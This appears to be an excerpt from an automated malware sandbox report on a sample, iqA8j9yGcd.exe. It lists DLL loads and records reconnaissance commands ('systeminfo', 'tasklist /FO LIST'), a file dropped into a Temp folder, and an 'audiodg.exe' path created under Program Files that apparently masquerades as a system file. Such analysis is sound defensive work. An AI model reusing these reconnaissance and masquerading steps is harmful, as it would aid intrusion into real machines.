Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\42af1c969fbb7b

Source: iqA8j9yGcd.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: iqA8j9yGcd.exe

Static file information: File size 29106718 > 1048576

Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: iqA8j9yGcd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: iqA8j9yGcd.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: iqA8j9yGcd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000005.00000000.2023329973.0000000000456000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000C.00000000.2060051193.0000000000EB3000.00000002.00000001.01000000.00000013.sdmp, s.exe, 0000000C.00000003.2070913256.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000C.00000002.2098083981.0000000000EB3000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817663620.00007FF8BA4F1000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2803790158.00007FF8A8180000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.2038690656.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2073061930.00007FF8B9F71000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2816532697.00007FF8B93D0000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2814776290.00007FF8B7E11000.00000040.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: based.exe, 00000008.00000002.2813439502.00007FF8A9355000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.9 30 May 20233.0.9built on: Tue Jul 11 19:52:20 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: based.exe, 00000008.00000002.2804456470.00007FF8A8651000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2816055518.00007FF8B8F8C000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: based.exe, based.exe, 00000008.00000002.2804456470.00007FF8A8651000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.2070711669.00007FF8A882F000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2816697386.00007FF8B9841000.00000040.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2816055518.00007FF8B8F8C000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2816935161.00007FF8B9F61000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: iqA8j9yGcd.exe, 00000000.00000003.2012424329.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp, based.exe, 00000007.00000003.2039323205.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817349912.00007FF8BA251000.00000002.00000001.01000000.0000000E.sdmp
